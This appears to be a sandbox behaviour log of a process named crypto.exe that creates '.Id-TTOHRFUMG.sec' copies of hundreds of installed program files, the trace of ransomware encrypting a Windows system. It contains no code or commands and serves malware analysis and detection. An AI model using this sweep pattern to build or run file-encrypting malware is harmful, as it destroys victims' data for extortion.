File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01357_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\IPML.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\LASER.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jsse.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237225.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ReceivePing.ex_.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00262_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00166_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ka.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABEL.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105410.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00100_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00364_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Person.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\INDOMAIN.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg_orange.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR50B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblendbench_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\JNWDRV.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitemask1047.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\d3dcompiler_47.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\OmdProject.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00013_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Almaty.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH00601G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21337_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jsoundds.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN090.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libadaptive_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GROOVE_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-runtime-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Phoenix.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00008_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\youtube.crx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\BG_ADOBE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149627.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB2A.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\header.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SELFCERT.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01158_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\et.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02287_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOSTYLE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\libxml2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185778.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TaxonomyControl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sr.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282928.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00452_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01164_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PPSLAX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\Synchronization.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN107.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCOUPON.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\librtpvideo_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Sitka.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107492.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18249_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.UK.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\msdatasrc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\EST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Waveform.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01575_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_chromecast_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115843.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.DOC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SketchPadTestSchema.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64\profilerinterface.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285750.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153302.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Author2XML.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_zh-TW.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\slideShow.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216858.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287018.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297759.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\NVBELL.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libdvbsub_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\msoe.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Defender\MsMpLics.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
